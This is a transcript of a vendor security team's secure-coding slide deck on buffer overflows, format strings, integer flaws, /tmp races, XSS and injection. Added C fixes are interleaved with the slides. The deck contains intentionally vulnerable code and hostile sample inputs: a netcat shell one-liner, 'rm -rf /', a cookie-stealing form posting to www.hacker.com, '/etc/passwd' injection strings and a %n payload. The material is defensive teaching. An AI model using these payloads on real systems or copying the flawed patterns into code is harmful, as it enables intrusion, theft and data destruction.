Transcript of "Secure Product Development How to avoid being 0wnz0r3d by ..."

  1. Secure Product Development - How to avoid being 0wnz0r3d by 31337 h4x04z.
  2. Security Team Introduction
     - Part of service group
     - Respond to NetScreen product flaws
     - Audit security of NetScreen products
     - Provide security knowledge to R&D
     - Create/maintain IDP signatures
     - Create/maintain hardened OS images
  3. Why Worry About Security?
     - We sell a security product
     - Embarrassment
     - Loss of revenue
     - Patch releases are inefficient
     - Save Security Team work
  4. Why Security Flaws Exist
     - Security is hard!
     - Lack of education
     - Lack of priority/schedule
     - No liability laws (yet)
     - C, the cursed language
  5. Designing a Secure Product
     - Security from the beginning
     - Clear security requirements
     - Multiple layers of security
     - Review issues in similar products
     - Allow time for security
  6. Developing a Secure Product
     - Training/experience
     - Think like a hacker
     - Never ever trust input
     - Check data obsessively
     - Code reviews
  7. Testing a Secure Product
     - Allocate time for security testing
     - Be mean (breaking things is your job)
     - Think like a hacker
     - Test for common flaws
  8. Common Flaws - BOFs
     - Buffer overflow
     - Most common serious flaw
     - Mostly a problem in C
     - libc functions usually at fault
  9. Buffer Overflows - Cont.
     - Text Segment
       - where executable code is stored
       - cannot be written to
     - Heap
       - where malloced memory is located
     - Stack
       - stores
         - local variables
         - stack frames
       - grows down
  10. Buffer Overflows - Cont.
     - Stack Frame
       - Tracks function calls
       - Saved Frame Pointer
         - points to the FP of the calling function
       - Return Address
         - contains the address of code in the calling function
         - this is the next line of code executed after a return statement
       - Local Variables
  11. Buffer Overflows - Cont.
     - Example of a Stack Buffer Overflow:

        #include <string.h>

        void foo(char *str){
            int a;
            char c[16];
            strcpy(c, str);   /* no length check: anything past 16 bytes overwrites a, the saved FP and the return address */
            return;
        }

        int main(int argc, char **argv){
            if(argc > 1)
                foo(argv[1]);
            return 0;
        }

  12. Buffer Overflows - Cont.
     - Use Example:

        # ./program "hello"

  13. Buffer Overflows - Cont.
     - Use Example:

        # ./program "AAAAAAAAAAAAAAAAAAAAAAAAAAAA"

     - (that's 28 As)
     - Return Address is now "AAAA" or 0x41414141!
  14. Buffer Overflows - Cont.
     - Use Example:

        # ./program "AAAAAAAAAAAAAAAAAAAAAAAA0xc0778012"

     - Return Address is now 0xc0778012 (the four address bytes follow the 24 As; they are written in hex here for readability)
     - on function return, the program starts executing c[0]
     - Since we control what goes in c[], we now control the program!
  15. Buffer Overflows - Cont.
     - What can a h4x0r do now?
       - Crash the machine (DoS)
       - Destroy data (rm -rf /)
       - Install a trojan (subseven, backorifice)
       - Spawn a shell (nc -l -p 5000 | sh)
     - On a NetScreen?
       - DoS (crash) most common result
       - Overwrite the policy with garbage?
       - Modify the policy to allow access?
       - Execute arbitrary ScreenOS commands?
  16. Buffer Overflows - Cont.
     - Heap overflows
     - Can modify variable values
       - logged_in = 1
       - is_superuser = 1
     - Code execution
       - Harder than stack overflows
       - Only works on some systems
       - Overwrites malloc headers
       - This is a very complex attack
  17. Dangerous libc Functions
     - The worst
       - strcpy
       - strcat
       - sprintf, vsprintf
       - gets
       - strlen
       - scanf, sscanf, fscanf, vscanf, vsscanf
     - Some others
       - realpath
       - getopt
       - getpass
       - streadd
       - strecpy
       - strtms
       - getwd
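Slides 11 to 14 show strcpy running past c[16] into the saved frame pointer and return address, and slide 17 lists the libc calls that do this. As an added example (not code from the slides), here is that foo() rewritten with an explicit bound; bounded_copy and foo_safe are names chosen for this example:

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the slides. The slide's foo() copies argv[1]
 * into c[16] with strcpy, which never looks at the size of c: anything
 * past 16 bytes runs over a, the saved frame pointer and the return
 * address. The version below keeps the 16-byte buffer and instead
 * refuses input that does not fit. */

/* Bounded copy: never writes past dstsz bytes, always NUL-terminates
 * dst, and returns strlen(src) so the caller can detect truncation
 * (the same contract as BSD strlcpy, spelled out here to avoid a
 * platform dependency). */
static size_t bounded_copy(char *dst, size_t dstsz, const char *src)
{
    size_t srclen = strlen(src);
    if (dstsz == 0)
        return srclen;
    size_t n = srclen < dstsz - 1 ? srclen : dstsz - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return srclen;   /* >= dstsz means src did not fit */
}

/* The slide's foo() hardened: 0 if str fit in c[16], -1 if rejected.
 * The slide's 28 A's (or 24 A's plus an address) are rejected here
 * instead of landing on the return address. */
int foo_safe(const char *str)
{
    char c[16];
    if (bounded_copy(c, sizeof c, str) >= sizeof c)
        return -1;
    /* c is a complete, NUL-terminated copy of at most 15 characters */
    return 0;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (foo_safe(argv[1]) != 0) {
        fprintf(stderr, "rejected: longer than 15 characters\n");
        return 1;
    }
    puts("ok");
    return 0;
}
```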
  18. Format String Flaws
     - Caused by improper use of *printf functions
     - printf(str) instead of printf("%s", str)
     - %n writes to memory: it stores the number of characters printed so far at the address it takes from the stack
     - Use field widths to increase that value (e.g. %100d)
     - Use multiple %n (one for each byte)
  19. Format String Example

        #include <stdio.h>

        int main(int argc, char **argv){
            char str[256];
            scanf("%255s", str);   /* look ma, no overflow! (255 leaves room for the terminating NUL) */
            printf(str);           /* str is the format string, not an argument */
            return 0;
        }

        # ./program
        AAAA%08x%08x%08x%08x%08x%n

     - We've overwritten memory at 0x41414141. Replace AAAA with your return address, or any other data structure location.
  20. Format Strings - Cont.
     - What can a hacker do now?
       - Take control of the program (overwrite the return address)
       - Dump memory using %s or %x
       - Modify arbitrary data structures
         - logged_in = 1
       - Crash the program (write to a bogus address, SEGFAULT)
  21. Format Strings - Cont.
     - Dangerous functions
       - fprintf
       - printf
       - sprintf
       - snprintf
       - vfprintf
       - vsprintf
       - vsnprintf
       - syslog
       - others (err*, verr*, warn*, vwarn*)
       - your own logging functions
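Slide 19's printf(str) lets the input act as the format. The added example below (not from the slides) shows the fixed-format alternative for the "your own logging functions" case on slide 21, plus a small detection check; log_fmt, log_user_input and count_conversions are names chosen here:

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the slides. Slide 19 calls printf(str), so the
 * input becomes the format: "%08x" reads stack words and "%n" writes to
 * one. The fix is a format the programmer wrote, with the data only ever
 * passed as an argument: printf("%s", str). */

/* A home-grown logging function like slide 21's last bullet. It takes a
 * format plus varargs, so a caller that hands user data in as fmt
 * reintroduces the bug; the attribute lets GCC/Clang warn on
 * non-literal formats (-Wformat -Wformat-security). */
#if defined(__GNUC__)
__attribute__((format(printf, 3, 4)))
#endif
static int log_fmt(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    return n;
}

/* Safe entry point for untrusted text: the format is fixed here and the
 * input is only a %s argument, so its %x/%n sequences are plain bytes. */
int log_user_input(char *out, size_t outsz, const char *untrusted)
{
    return log_fmt(out, outsz, "input: %s", untrusted);
}

/* Detection helper: count conversion specifiers in a string. A field that
 * should never contain one (username, hostname) with a count > 0 is worth
 * logging as a probe for this bug. "%%" is a literal percent, not counted. */
int count_conversions(const char *s)
{
    int count = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {
            s++;        /* skip the escaped percent */
            continue;
        }
        count++;
    }
    return count;
}

int main(void)
{
    char line[128];
    log_user_input(line, sizeof line, "AAAA%08x%08x%08x%08x%08x%n");
    printf("%s (%d conversions)\n", line, count_conversions(line));
    return 0;
}
```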
  22. Integer Flaws
     - Even integer math can contain flaws
     - Sign mistakes
     - Integer overflows
  23. Integer Sign Flaws
     - Relatively common
     - Have to check function prototypes
     - (unsigned int)-1 = 4,294,967,295
     - Hard to exploit
     - Apache chunked encoding vulnerability
  24. Integer Sign Flaw - Example

        #include <stdio.h>
        #include <string.h>

        void foo(int len, char *src){
            char buf[256];
            if(len > 256) {   /* no overflows allowed! (but len is signed, so -1 passes this test) */
                printf("error!");
                return;
            }
            memcpy(buf, src, len);   /* len is converted to size_t here: -1 becomes 4,294,967,295 */
            printf("ok!");
        }

        foo(7, "hello");  -- ok!
        foo(500, ...);    -- error!
        foo(-1, ...);     -- SEGFAULT

  25. Integer Overflows
     - What happens when an int gets too big?
     - 4,294,967,295 + 1 = 0
     - All integer math is mod 2^32 (for 32-bit ints)
     - No way to tell this has happened
  26. Integer Overflow Example

        #include <stdlib.h>

        int* arraydup(int *array, unsigned int n){
            int *newarray = malloc( n * sizeof(int) );   /* the multiplication can wrap */
            unsigned int i;
            for(i = 0; i < n ; i++){
                newarray[i] = array[i];   /* then this loop writes far past the (tiny) allocation */
            }
            return newarray;
        }

     - if n = 1073741824, n * sizeof(int) = 4294967296 = 0 (in 32-bit arithmetic)
  27. Integer Overflow Example(2)

        #include <stdlib.h>
        #include <string.h>

        /* called strcat on the slide; renamed here so it does not clash with the libc prototype */
        char *strcat2(char *str1, unsigned int len1, char *str2, unsigned int len2)
        {
            char *newstr = malloc( len1 + len2 );   /* the addition can wrap */
            memcpy(newstr, str1, len1 );
            memcpy(newstr + len1 , str2, len2 );
            return newstr;
        }

     - if len1 = len2 = 0x80000000, len1 + len2 = 0x0100000000 = 0
     - result: SEGFAULT
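The sign flaw on slide 24 and the wraps on slides 26 and 27 are all caught by checking the arithmetic before trusting it. Added example, not from the slides; mul_u32, add_u32, foo_checked and arraydup_checked are names chosen here, and the checks use uint32_t so the slides' 32-bit numbers hold on any platform:

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not from the slides. Slides 24, 26 and 27 share one
 * root cause: the arithmetic silently wraps or changes sign. The checks
 * below are done in uint32_t so they reproduce the slides' 32-bit
 * figures on any platform; function names are chosen here. */

/* a * b without wraparound; false means the product needs > 32 bits.
 * Comparing against the quotient avoids ever computing the wrapped value. */
bool mul_u32(uint32_t a, uint32_t b, uint32_t *out)
{
    if (a != 0 && b > UINT32_MAX / a)
        return false;        /* slide 26: 1073741824 * 4 would wrap to 0 */
    *out = a * b;
    return true;
}

/* a + b without wraparound. */
bool add_u32(uint32_t a, uint32_t b, uint32_t *out)
{
    if (b > UINT32_MAX - a)
        return false;        /* slide 27: 0x80000000 + 0x80000000 would wrap to 0 */
    *out = a + b;
    return true;
}

/* Slide 24's foo() with the sign flaw closed: a negative len is rejected
 * before it reaches memcpy, where it would become 4,294,967,295. */
int foo_checked(int len, const char *src)
{
    char buf[256];
    if (len < 0 || (size_t)len > sizeof buf)
        return -1;           /* foo(500, ...) and foo(-1, ...) both end here */
    memcpy(buf, src, (size_t)len);
    return 0;
}

/* Slide 26's arraydup() with the allocation size checked first. */
int *arraydup_checked(const int *array, uint32_t n)
{
    uint32_t bytes;
    if (!mul_u32(n, (uint32_t)sizeof(int), &bytes))
        return NULL;         /* refuse, rather than malloc(0) and then copy past it */
    int *newarray = malloc(bytes);
    if (newarray != NULL)
        memcpy(newarray, array, bytes);
    return newarray;
}
```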
  28. /tmp Attacks
     - Can happen when the filename is predictable
     - Attacker can symlink the file to anything
     - Not just /tmp
     - Solution: use tempnam, etc.
  29. /tmp Attacks - Example

        #include <fcntl.h>

        int main(){
            int fd = creat("/tmp/foo", 0600);   /* fixed, predictable name; creat() follows an existing symlink */
            write_temp_data(fd);                /* not shown on the slide */
            return 0;
        }

     - Attacker can symlink /tmp/foo to some other file owned by the process UID. You're not root, are you?
       - /etc/passwd
       - /var/firewall/policy.txt
     - If the attacker can control what is written, it could be an even worse attack
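The race on slide 29 is closed by making the name unpredictable and the create exclusive. Added example (not from the slides); open_private_tmp and open_noclobber are names chosen here, and it assumes a POSIX system with a writable /tmp:

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Added example, not from the slides. The slide's creat("/tmp/foo", ...)
 * opens whatever /tmp/foo already is; if an attacker pre-created it as
 * a symlink, the write lands on the link target. Two properties close
 * the hole: a name the attacker cannot predict, and O_CREAT|O_EXCL, so
 * the open fails instead of following an existing path. mkstemp() gives
 * both, which is why it is preferred here over tempnam(), which only
 * returns a name and leaves the same race between name and open. */

/* Create a private temp file; returns the fd or -1. On success, path is
 * overwritten with the name actually created, for unlink() later. */
int open_private_tmp(char *path, size_t pathsz)
{
    /* mkstemp needs a writable template ending in XXXXXX; it replaces
     * them and opens with O_CREAT|O_EXCL and mode 0600 */
    if (snprintf(path, pathsz, "/tmp/foo.XXXXXX") >= (int)pathsz)
        return -1;
    return mkstemp(path);
}

/* For a fixed name that must be created fresh: exclusive create plus
 * O_NOFOLLOW, so an existing file or a pre-placed symlink makes the
 * call fail (EEXIST/ELOOP) rather than write somewhere else. */
int open_noclobber(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Stand-in for the slide's write_temp_data(); the payload is constructed. */
static int write_temp_data(int fd)
{
    const char msg[] = "constructed sample data\n";
    return write(fd, msg, sizeof msg - 1) == (ssize_t)(sizeof msg - 1) ? 0 : -1;
}

int main(void)
{
    char path[64];
    int fd = open_private_tmp(path, sizeof path);
    if (fd < 0) {
        perror("mkstemp");
        return 1;
    }
    int rc = write_temp_data(fd);
    close(fd);
    unlink(path);   /* done with it: remove so the name cannot be reused */
    return rc == 0 ? 0 : 1;
}
```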
  30. Cross-Site Scripting
     - HTML/javascript attack
     - Way to trick other users
     - Can occur whenever user-provided data is displayed (NetScreen FW Logs)
     - Very difficult to block; script can be entered many ways
     - Only allow good characters, don't try to block bad
  31. Cross-Site Scripting - Example

        <?php
        print "Welcome $username";
        ?>

     - What if username was:

        <form action=www.hacker.com/gather.cgi><input type=hidden name=cookie onLoad="value=document.cookie; form.submit();"></form>victim

     - Victim would see "Welcome victim!" but their cookie was just stolen.
     - Can be made less conspicuous by using URL encodings, e.g.:

        /login.php?username=<form...

       can look like:

        /login.php?%75%73%65%72%6e%61%6d%65%3d%3c%66%6f%72%6d...

  32. Command/SQL Injection
     - Can occur whenever commands are executed
     - Also in all SQL statements
     - Prematurely end the statement, add a 2nd statement
     - Don't filter out bad characters, only allow good characters
  33. Command Injection - Example

        #!/bin/perl
        # Web-based finger gateway
        $user = $form{user};              # %form holds the parsed request fields
        @output = `/bin/finger $user`;    # $user reaches the shell unquoted and unchecked
        print @output;

     - What if $form{user} was "foo; rm -rf /" or "foo; cat /etc/passwd"?
     - The ';' terminates the 1st command and begins the 2nd command.
     - Not only ';', some shells allow &&, ||, etc.
  34. SQL Injection - Example

        void insert_log(char *user, char *log){
            db->insert("insert into log values(%s, %s)", user, log);   /* values are pasted into the statement text */
        }

     - What if log was: "executed command: foo); truncate table log;"
     - (presumably the attacker typed "foo); truncate table log;" at the prompt)
     - Or this: "update userdb set password=$passwd where user=$user;"
     - What if $user was "attacker or user like 'admin'"
     - The attacker just set the admin's password!
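Slides 30, 32 and 34 all end with the same rule: allow known-good characters rather than filtering known-bad ones. Added example, not from the slides, of that rule applied to the finger gateway's user field and to the free-text log message of slide 34; valid_username and html_escape are names chosen here:

```c
#include <ctype.h>
#include <stdbool.h>
#include <string.h>

/* Added example, not from the slides. Slides 30, 32 and 34 give one rule
 * for XSS, command and SQL injection: decide what a good value looks like
 * and accept only that, rather than hunting for bad characters (which
 * misses URL encoding, &&, ||, quoting tricks and whatever nobody listed). */

/* Allow-list for the finger gateway's user field: 1..32 characters of
 * [A-Za-z0-9_.-], not starting with '-' (so it cannot read as an option).
 * Every payload on slides 31, 33 and 34 fails this check. */
bool valid_username(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 32 || s[0] == '-')
        return false;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '_' && c != '.' && c != '-')
            return false;
    }
    return true;
}

/* Free-text fields (slide 34's log message) cannot be allow-listed, so
 * escape them before they go into HTML. Returns the full escaped length
 * (excluding NUL); output stops after the last whole entity that fits. */
size_t html_escape(const char *in, char *out, size_t outsz)
{
    size_t needed = 0, written = 0;
    bool full = false;
    for (; *in; in++) {
        char one[2] = { *in, '\0' };
        const char *rep = one;
        switch (*in) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t len = strlen(rep);
        if (!full && written + len < outsz) {
            memcpy(out + written, rep, len);
            written += len;
        } else {
            full = true;
        }
        needed += len;
    }
    if (outsz > 0)
        out[written] = '\0';
    return needed;
}
```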
  35. Summary
     - Plan for security
     - Always keep security in mind
     - For developers:
       - Never trust input
       - Check everything
       - Only allow valid data
       - Be familiar with common security flaws
  36. Thank You
     - You've just made our job easier.